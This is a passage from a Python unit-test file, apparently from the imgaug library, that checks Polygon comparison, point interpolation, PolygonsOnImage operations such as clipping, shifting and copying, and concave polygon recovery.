assert s == "Polygon([(x=0.000, y=0.500), (x=1.500, y=0.000), (x=1.000, y=1.000), (x=0.000, y=1.000)] " \
+ "(4 points), label=test)"
# label None
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label=None)
s = func(poly)
assert s == "Polygon([(x=0.000, y=0.000), (x=1.000, y=0.000), (x=1.000, y=1.000), (x=0.000, y=1.000)] " \
+ "(4 points), label=None)"
# no points
poly = ia.Polygon([], label="test")
s = func(poly)
assert s == "Polygon([] (0 points), label=test)"
def test_Polygon_exterior_almost_equals():
# exactly same exterior
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert poly_a.exterior_almost_equals(poly_b)
# one point duplicated
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(0, 0), (1, 0), (1, 1), (1, 1), (0, 1)])
assert poly_a.exterior_almost_equals(poly_b)
# several points added without changing geometry
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(0, 0), (0.5, 0), (1, 0), (1, 0.5), (1, 1), (0.5, 1), (0, 1), (0, 0.5)])
assert poly_a.exterior_almost_equals(poly_b)
# different order
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(0, 1), (1, 1), (1, 0), (0, 0)])
assert poly_a.exterior_almost_equals(poly_b)
# tiny shift below tolerance
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(0+1e-6, 0), (1+1e-6, 0), (1+1e-6, 1), (0+1e-6, 1)])
assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-3)
# tiny shift above tolerance
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(0+1e-6, 0), (1+1e-6, 0), (1+1e-6, 1), (0+1e-6, 1)])
assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-9)
# shifted polygon towards half overlap
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(0.5, 0), (1.5, 0), (1.5, 1), (0.5, 1)])
assert not poly_a.exterior_almost_equals(poly_b)
# shifted polygon towards no overlap at all
poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(100, 0), (101, 0), (101, 1), (100, 1)])
assert not poly_a.exterior_almost_equals(poly_b)
# both polygons without points
poly_a = ia.Polygon([])
poly_b = ia.Polygon([])
assert poly_a.exterior_almost_equals(poly_b)
# both polygons with one point
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0)])
assert poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(100, 100)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0+1e-6, 0)])
assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0+1, 0)])
assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
# both polygons with two points
poly_a = ia.Polygon([(0, 0), (1, 0)])
poly_b = ia.Polygon([(0, 0), (1, 0)])
assert poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (0, 0)])
poly_b = ia.Polygon([(0, 0), (0, 0)])
assert poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (1, 0)])
poly_b = ia.Polygon([(0, 0), (2, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (1, 0)])
poly_b = ia.Polygon([(0+1e-6, 0), (1+1e-6, 0)])
assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
# both polygons with three points
poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
assert poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
poly_b = ia.Polygon([(0, 0), (1, -1), (0.5, 1)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
poly_b = ia.Polygon([(0, 0), (1+1e-6, 0), (0.5, 1)])
assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
# one polygon with zero points, other with one
poly_a = ia.Polygon([])
poly_b = ia.Polygon([(0, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([])
assert not poly_a.exterior_almost_equals(poly_b)
# one polygon with one point, other with two
poly_a = ia.Polygon([(-10, -20)])
poly_b = ia.Polygon([(0, 0), (1, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (1, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (1, 0)])
poly_b = ia.Polygon([(0, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (0, 0)])
poly_b = ia.Polygon([(0, 0)])
assert poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0, 0)])
assert poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (0+1e-6, 0)])
poly_b = ia.Polygon([(0, 0)])
assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
poly_a = ia.Polygon([(0, 0), (0+1e-4, 0)])
poly_b = ia.Polygon([(0, 0)])
assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-9)
# one polygon with one point, other with three
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
poly_b = ia.Polygon([(0, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0, 0), (0, 0)])
assert poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0, 0), (1, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (1, 0), (0, 0)])
assert not poly_a.exterior_almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0+1e-6, 0), (0, 0+1e-6)])
assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0+1e-4, 0), (0, 0+1e-4)])
assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-9)
# two polygons that are different, but with carefully placed points so that interpolation between polygon
# points is necessary to spot the difference
poly_a = ia.Polygon([(1, 0), (1, 1), (0, 1)])
poly_b = ia.Polygon([(1, 0), (1, 1), (0, 1), (1-1e-6, 1-1e-6)])
assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-4, interpolate=0)
assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-4, interpolate=1)
def test_Polygon_almost_equals():
poly_a = ia.Polygon([])
poly_b = ia.Polygon([])
assert poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0)])
assert poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0, 0)])
assert poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0, 0), (0, 0)])
assert poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (0+1e-10, 0)])
assert poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)], label="test")
poly_b = ia.Polygon([(0, 0)])
assert not poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0)], label="test")
assert not poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)], label="test")
poly_b = ia.Polygon([(0, 0)], label="test")
assert poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)], label="test")
poly_b = ia.Polygon([(1, 0)], label="test")
assert not poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)], label="testA")
poly_b = ia.Polygon([(0, 0)], label="testB")
assert not poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
assert poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
assert not poly_a.almost_equals(poly_b)
poly_a = ia.Polygon([(0, 0)])
assert not poly_a.almost_equals("foo")
def test___convert_points_to_shapely_line_string():
# TODO this function seems to already be covered completely by other tests, so add a proper test later
pass
def test__interpolate_point_pair():
point_a = (0, 0)
point_b = (1, 2)
inter = _interpolate_point_pair(point_a, point_b, 1)
assert np.allclose(
inter,
np.float32([
[0.5, 1.0]
])
)
inter = _interpolate_point_pair(point_a, point_b, 2)
assert np.allclose(
inter,
np.float32([
[1*1/3, 1*2/3],
[2*1/3, 2*2/3]
])
)
inter = _interpolate_point_pair(point_a, point_b, 0)
assert len(inter) == 0
def test__interpolate_points():
# 2 points
points = [
(0, 0),
(1, 2)
]
inter = _interpolate_points(points, 0)
assert np.allclose(
inter,
np.float32([
[0, 0],
[1, 2]
])
)
inter = _interpolate_points(points, 1)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0.5, 1.0],
[1, 2],
[0.5, 1.0]
])
)
inter = _interpolate_points(points, 1, closed=False)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0.5, 1.0],
[1, 2]
])
)
# 3 points
points = [
(0, 0),
(1, 2),
(0.5, 3)
]
inter = _interpolate_points(points, 0)
assert np.allclose(
inter,
np.float32([
[0, 0],
[1, 2],
[0.5, 3]
])
)
inter = _interpolate_points(points, 1)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0.5, 1.0],
[1, 2],
[0.75, 2.5],
[0.5, 3],
[0.25, 1.5]
])
)
inter = _interpolate_points(points, 1, closed=False)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0.5, 1.0],
[1, 2],
[0.75, 2.5],
[0.5, 3]
])
)
# 0 points
points = []
inter = _interpolate_points(points, 1)
assert len(inter) == 0
# 1 point
points = [(0, 0)]
inter = _interpolate_points(points, 0)
assert np.allclose(
inter,
np.float32([
[0, 0]
])
)
inter = _interpolate_points(points, 1)
assert np.allclose(
inter,
np.float32([
[0, 0]
])
)
def test__interpolate_points_by_max_distance():
# 2 points
points = [
(0, 0),
(0, 2)
]
inter = _interpolate_points_by_max_distance(points, 10000)
assert np.allclose(
inter,
points
)
inter = _interpolate_points_by_max_distance(points, 1.0)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0, 1.0],
[0, 2],
[0, 1.0]
])
)
inter = _interpolate_points_by_max_distance(points, 1.0, closed=False)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0, 1.0],
[0, 2]
])
)
# 3 points
points = [
(0, 0),
(0, 2),
(2, 0)
]
inter = _interpolate_points_by_max_distance(points, 1.0)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0, 1.0],
[0, 2],
[1.0, 1.0],
[2, 0],
[1.0, 0]
])
)
inter = _interpolate_points_by_max_distance(points, 1.0, closed=False)
assert np.allclose(
inter,
np.float32([
[0, 0],
[0, 1.0],
[0, 2],
[1.0, 1.0],
[2, 0]
])
)
# 0 points
points = []
inter = _interpolate_points_by_max_distance(points, 1.0)
assert len(inter) == 0
# 1 points
points = [(0, 0)]
inter = _interpolate_points_by_max_distance(points, 1.0)
assert np.allclose(
inter,
np.float32([
[0, 0]
])
)
class TestPolygonsOnImage(unittest.TestCase):
def setUp(self):
reseed()
def test__init__(self):
# standard case with one polygon
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])],
shape=(10, 10, 3)
)
assert len(poly_oi.polygons) == 1
assert np.allclose(
poly_oi.polygons[0].exterior,
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0, atol=1e-4)
assert poly_oi.shape == (10, 10, 3)
# standard case with multiple polygons
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)]),
ia.Polygon([(0, 0), (1, 0), (1, 1)]),
ia.Polygon([(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)])],
shape=(10, 10, 3)
)
assert len(poly_oi.polygons) == 3
assert np.allclose(
poly_oi.polygons[0].exterior,
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0, atol=1e-4)
assert np.allclose(
poly_oi.polygons[1].exterior,
[(0, 0), (1, 0), (1, 1)],
rtol=0, atol=1e-4)
assert np.allclose(
poly_oi.polygons[2].exterior,
[(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)],
rtol=0, atol=1e-4)
assert poly_oi.shape == (10, 10, 3)
# list of polygons is empty
poly_oi = ia.PolygonsOnImage(
[],
shape=(10, 10, 3)
)
assert len(poly_oi.polygons) == 0
# invalid polygon
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(0, 0), (0.5, 0), (0.5, 1.5), (0, 1), (1, 1), (0, 1)])],
shape=(10, 10, 3)
)
assert len(poly_oi.polygons) == 1
assert np.allclose(
poly_oi.polygons[0].exterior,
[(0, 0), (0.5, 0), (0.5, 1.5), (0, 1), (1, 1), (0, 1)],
rtol=0, atol=1e-4)
# shape given as numpy array
poly_oi = ia.PolygonsOnImage(
[],
shape=np.zeros((10, 10, 3), dtype=np.uint8)
)
assert poly_oi.shape == (10, 10, 3)
# 2D shape
poly_oi = ia.PolygonsOnImage(
[],
shape=(10, 11)
)
assert poly_oi.shape == (10, 11)
def test_empty(self):
# standard case with multiple polygons
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)]),
ia.Polygon([(0, 0), (1, 0), (1, 1)]),
ia.Polygon([(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)])],
shape=(10, 10, 3)
)
assert poly_oi.empty is False
# list of polygons is empty
poly_oi = ia.PolygonsOnImage([], shape=(10, 10, 3))
assert poly_oi.empty is True
def test_on(self):
# size unchanged
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)]),
ia.Polygon([(0, 0), (1, 0), (1, 1)]),
ia.Polygon([(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)])],
shape=(1, 1, 3)
)
poly_oi_proj = poly_oi.on((1, 1, 3))
assert np.allclose(
poly_oi_proj.polygons[0].exterior,
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0, atol=1e-4)
assert np.allclose(
poly_oi_proj.polygons[1].exterior,
[(0, 0), (1, 0), (1, 1)],
rtol=0, atol=1e-4)
assert np.allclose(
poly_oi_proj.polygons[2].exterior,
[(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)],
rtol=0, atol=1e-4)
assert poly_oi_proj.shape == (1, 1, 3)
# 10x decrease in size
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(0, 0), (10, 0), (10, 10), (0, 10)]),
ia.Polygon([(0, 0), (10, 0), (10, 10)]),
ia.Polygon([(5, 0), (10, 5), (5, 10), (0, 5)])],
shape=(10, 10, 3)
)
poly_oi_proj = poly_oi.on((1, 1, 3))
assert np.allclose(
poly_oi_proj.polygons[0].exterior,
[(0, 0), (1, 0), (1, 1), (0, 1)],
rtol=0, atol=1e-4)
assert np.allclose(
poly_oi_proj.polygons[1].exterior,
[(0, 0), (1, 0), (1, 1)],
rtol=0, atol=1e-4)
assert np.allclose(
poly_oi_proj.polygons[2].exterior,
[(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)],
rtol=0, atol=1e-4)
assert poly_oi_proj.shape == (1, 1, 3)
# 2x increase in width, 10x decrease in height
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(0, 0), (50, 0), (50, 100), (0, 100)])],
shape=(100, 100, 3)
)
poly_oi_proj = poly_oi.on((10, 200, 3))
assert np.allclose(
poly_oi_proj.polygons[0].exterior,
[(0, 0), (100, 0), (100, 10), (0, 10)],
rtol=0, atol=1e-4)
assert poly_oi_proj.shape == (10, 200, 3)
def test_draw_on_image(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
# no polygons, nothing changed
poly_oi = ia.PolygonsOnImage([], shape=image.shape)
image_drawn = poly_oi.draw_on_image(image)
assert np.sum(image) == 0
assert np.sum(image_drawn) == 0
# draw two polygons
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (9, 1), (9, 9), (1, 9)]),
ia.Polygon([(3, 3), (7, 3), (7, 7), (3, 7)])],
shape=image.shape)
image_expected = np.copy(image)
image_expected = poly_oi.polygons[0].draw_on_image(image_expected)
image_expected = poly_oi.polygons[1].draw_on_image(image_expected)
image_drawn = poly_oi.draw_on_image(image)
assert np.sum(image) == 0
assert np.sum(image_drawn) > 0
assert np.sum(image_expected) > 0
assert np.allclose(image_drawn, image_expected)
def test_remove_out_of_image(self):
# no polygons, nothing to remove
poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
for fully, partly in [(False, False), (False, True),
(True, False), (True, True)]:
poly_oi_rm = poly_oi.remove_out_of_image(fully=fully, partly=partly)
assert len(poly_oi_rm.polygons) == 0
assert poly_oi_rm.shape == (10, 11, 3)
# one polygon, fully inside the image
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (9, 1), (9, 9), (1, 9)])],
shape=(10, 11, 3))
for fully, partly in [(False, False), (False, True),
(True, False), (True, True)]:
poly_oi_rm = poly_oi.remove_out_of_image(fully=fully, partly=partly)
assert len(poly_oi_rm.polygons) == 1
assert np.allclose(poly_oi_rm.polygons[0].exterior,
[(1, 1), (9, 1), (9, 9), (1, 9)],
rtol=0, atol=1e-4)
assert poly_oi_rm.shape == (10, 11, 3)
# two polygons, one partly outside, one fully outside
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (11, 1), (11, 9), (1, 9)]),
ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
shape=(10, 10, 3))
poly_oi_rm = poly_oi.remove_out_of_image(fully=False, partly=False)
assert len(poly_oi.polygons) == 2
assert len(poly_oi_rm.polygons) == 2
assert np.allclose(poly_oi_rm.polygons[0].exterior,
[(1, 1), (11, 1), (11, 9), (1, 9)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_rm.polygons[1].exterior,
[(100, 100), (200, 100), (200, 200), (100, 200)],
rtol=0, atol=1e-4)
assert poly_oi_rm.shape == (10, 10, 3)
poly_oi_rm = poly_oi.remove_out_of_image(fully=True, partly=False)
assert len(poly_oi.polygons) == 2
assert len(poly_oi_rm.polygons) == 1
assert np.allclose(poly_oi_rm.polygons[0].exterior,
[(1, 1), (11, 1), (11, 9), (1, 9)],
rtol=0, atol=1e-4)
assert poly_oi_rm.shape == (10, 10, 3)
poly_oi_rm = poly_oi.remove_out_of_image(fully=False, partly=True)
assert len(poly_oi.polygons) == 2
assert len(poly_oi_rm.polygons) == 1
assert np.allclose(poly_oi_rm.polygons[0].exterior,
[(100, 100), (200, 100), (200, 200), (100, 200)],
rtol=0, atol=1e-4)
assert poly_oi_rm.shape == (10, 10, 3)
poly_oi_rm = poly_oi.remove_out_of_image(fully=True, partly=True)
assert len(poly_oi.polygons) == 2
assert len(poly_oi_rm.polygons) == 0
assert poly_oi_rm.shape == (10, 10, 3)
def test_clip_out_of_image(self):
# NOTE: clip_out_of_image() can change the order of points,
# hence we check here for each expected point whether it appears
# somewhere in the list of points
def _any_point_close(points, point_search):
found = False
for point in points:
if np.allclose(point, point_search, atol=1e-4, rtol=0):
found = True
return found
# no polygons
poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
poly_oi_clip = poly_oi.clip_out_of_image()
assert len(poly_oi_clip.polygons) == 0
assert poly_oi_clip.shape == (10, 11, 3)
# one polygon, fully inside
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)])],
shape=(10, 11, 3))
poly_oi_clip = poly_oi.clip_out_of_image()
assert len(poly_oi_clip.polygons) == 1
for point_search in [(1, 1), (8, 1), (8, 9), (1, 9)]:
assert _any_point_close(poly_oi_clip.polygons[0].exterior,
point_search)
assert poly_oi_clip.shape == (10, 11, 3)
# one polygon, partially outside
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (15, 1), (15, 9), (1, 9)])],
shape=(10, 11, 3))
poly_oi_clip = poly_oi.clip_out_of_image()
assert len(poly_oi_clip.polygons) == 1
for point_search in [(1, 1), (11, 1), (11, 9), (1, 9)]:
assert _any_point_close(poly_oi_clip.polygons[0].exterior,
point_search)
assert poly_oi_clip.shape == (10, 11, 3)
# one polygon, fully outside
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
shape=(10, 11, 3))
poly_oi_clip = poly_oi.clip_out_of_image()
assert len(poly_oi_clip.polygons) == 0
assert poly_oi_clip.shape == (10, 11, 3)
# three polygons, one fully inside, one partially outside,
# one fully outside
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
ia.Polygon([(1, 1), (15, 1), (15, 9), (1, 9)]),
ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
shape=(10, 11, 3))
poly_oi_clip = poly_oi.clip_out_of_image()
assert len(poly_oi_clip.polygons) == 2
for point_search in [(1, 1), (8, 1), (8, 9), (1, 9)]:
assert _any_point_close(poly_oi_clip.polygons[0].exterior,
point_search)
for point_search in [(1, 1), (11, 1), (11, 9), (1, 9)]:
assert _any_point_close(poly_oi_clip.polygons[1].exterior,
point_search)
assert poly_oi_clip.shape == (10, 11, 3)
def test_shift(self):
# no polygons
poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
poly_oi_shifted = poly_oi.shift(top=3, right=0, bottom=1, left=-3)
assert len(poly_oi_shifted.polygons) == 0
assert poly_oi_shifted.shape == (10, 11, 3)
# three polygons
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
ia.Polygon([(1, 1), (15, 1), (15, 9), (1, 9)]),
ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
shape=(10, 11, 3))
poly_oi_shifted = poly_oi.shift(top=3, right=0, bottom=1, left=-3)
assert len(poly_oi_shifted.polygons) == 3
assert np.allclose(poly_oi_shifted.polygons[0].exterior,
[(1-3, 1+2), (8-3, 1+2), (8-3, 9+2), (1-3, 9+2)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_shifted.polygons[1].exterior,
[(1-3, 1+2), (15-3, 1+2), (15-3, 9+2), (1-3, 9+2)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_shifted.polygons[2].exterior,
[(100-3, 100+2), (200-3, 100+2),
(200-3, 200+2), (100-3, 200+2)],
rtol=0, atol=1e-4)
assert poly_oi_shifted.shape == (10, 11, 3)
def test_copy(self):
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
shape=(10, 11, 3))
poly_oi_copy = poly_oi.copy()
assert len(poly_oi_copy.polygons) == 2
assert np.allclose(poly_oi_copy.polygons[0].exterior,
[(1, 1), (8, 1), (8, 9), (1, 9)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_copy.polygons[1].exterior,
[(2, 2), (16, 2), (16, 10), (2, 10)],
rtol=0, atol=1e-4)
poly_oi_copy.polygons = [ia.Polygon([(0, 0), (1, 0), (1, 1)])]
assert np.allclose(poly_oi.polygons[0].exterior,
[(1, 1), (8, 1), (8, 9), (1, 9)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_copy.polygons[0].exterior,
[(0, 0), (1, 0), (1, 1)],
rtol=0, atol=1e-4)
poly_oi_copy.shape = (20, 30, 3)
assert poly_oi.shape == (10, 11, 3)
assert poly_oi_copy.shape == (20, 30, 3)
def test_deepcopy(self):
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
shape=(10, 11, 3))
poly_oi_copy = poly_oi.deepcopy()
assert len(poly_oi_copy.polygons) == 2
assert np.allclose(poly_oi_copy.polygons[0].exterior,
[(1, 1), (8, 1), (8, 9), (1, 9)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_copy.polygons[1].exterior,
[(2, 2), (16, 2), (16, 10), (2, 10)],
rtol=0, atol=1e-4)
poly_oi_copy.polygons[0] = ia.Polygon([(0, 0), (1, 0), (1, 1)])
assert np.allclose(poly_oi.polygons[0].exterior,
[(1, 1), (8, 1), (8, 9), (1, 9)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_copy.polygons[0].exterior,
[(0, 0), (1, 0), (1, 1)],
rtol=0, atol=1e-4)
poly_oi_copy.polygons[1].exterior[0][0] = 100
assert np.allclose(poly_oi.polygons[1].exterior,
[(2, 2), (16, 2), (16, 10), (2, 10)],
rtol=0, atol=1e-4)
assert np.allclose(poly_oi_copy.polygons[1].exterior,
[(100, 2), (16, 2), (16, 10), (2, 10)],
rtol=0, atol=1e-4)
poly_oi_copy.shape = (20, 30, 3)
assert poly_oi.shape == (10, 11, 3)
assert poly_oi_copy.shape == (20, 30, 3)
def test__repr__(self):
poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
assert poly_oi.__repr__() == "PolygonsOnImage([], shape=(10, 11, 3))"
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
shape=(10, 11, 3))
assert poly_oi.__repr__() == (
"PolygonsOnImage(["
+ "Polygon([(x=1.000, y=1.000), (x=8.000, y=1.000), "
+ "(x=8.000, y=9.000), (x=1.000, y=9.000)] "
+ "(4 points), label=None), "
+ "Polygon([(x=2.000, y=2.000), (x=16.000, y=2.000), "
+ "(x=16.000, y=10.000), (x=2.000, y=10.000)] "
+ "(4 points), label=None)"
+ "], shape=(10, 11, 3))")
def test__str__(self):
poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
assert poly_oi.__repr__() == "PolygonsOnImage([], shape=(10, 11, 3))"
poly_oi = ia.PolygonsOnImage(
[ia.Polygon([(1, 1), (8, 1), (8, 9), (1, 9)]),
ia.Polygon([(2, 2), (16, 2), (16, 10), (2, 10)])],
shape=(10, 11, 3))
assert poly_oi.__repr__() == (
"PolygonsOnImage(["
+ "Polygon([(x=1.000, y=1.000), (x=8.000, y=1.000), "
+ "(x=8.000, y=9.000), (x=1.000, y=9.000)] "
+ "(4 points), label=None), "
+ "Polygon([(x=2.000, y=2.000), (x=16.000, y=2.000), "
+ "(x=16.000, y=10.000), (x=2.000, y=10.000)] "
+ "(4 points), label=None)"
+ "], shape=(10, 11, 3))")
class Test_ConcavePolygonRecoverer(unittest.TestCase):
def setUp(self):
reseed()
@classmethod
def _assert_points_are_identical(cls, observed, expected, atol=1e-8, rtol=0):
assert len(observed) == len(expected)
for i, (ps_obs, ps_exp) in enumerate(zip(observed, expected)):
assert len(ps_obs) == len(ps_exp), "Failed at point %d" % (i,)
for p_obs, p_exp in zip(ps_obs, ps_exp):
assert len(p_obs) == 2
assert len(p_exp) == 2
assert np.allclose(p_obs, p_exp, atol=atol, rtol=rtol), "Unexpected coords at %d" % (i,)
def test_recover_from_fails_for_less_than_three_points(self):
old_polygon = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
cpr = _ConcavePolygonRecoverer()
with self.assertRaises(AssertionError):
_poly = cpr.recover_from([], old_polygon)
with self.assertRaises(AssertionError):
_poly = cpr.recover_from([(0, 0)], old_polygon)
with self.assertRaises(AssertionError):
_poly = cpr.recover_from([(0, 0), (1, 0)], old_polygon)
_poly = cpr.recover_from([(0, 0), (1, 0), (1, 1)], old_polygon)
def test_recover_from_predefined_polygons(self):
cpr = _ConcavePolygonRecoverer()
# concave input
polys = [
[(0, 0), (1, 0), (1, 1)],
[(0, 0), (1, 0), (1, 1), (0, 1)],
[(0, 0), (0.5, 0), (1, 0), (1, 0.5), (1, 1), (0.5, 1.0), (0, 1)],
]
for poly in polys:
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
+ (point[1] - point_ext[1])**2
)
if dist < 0.01:
found[i] = True
assert all(found)
# line
poly = [(0, 0), (1, 0), (2, 0)]
old_polygon = ia.Polygon(poly)
poly_concave = cpr.recover_from(poly, old_polygon)
assert poly_concave.is_valid
found = [False] * len(poly)
for i, point in enumerate(poly):
for point_ext in poly_concave.exterior:
dist = np.sqrt(
(point[0] - point_ext[0])**2
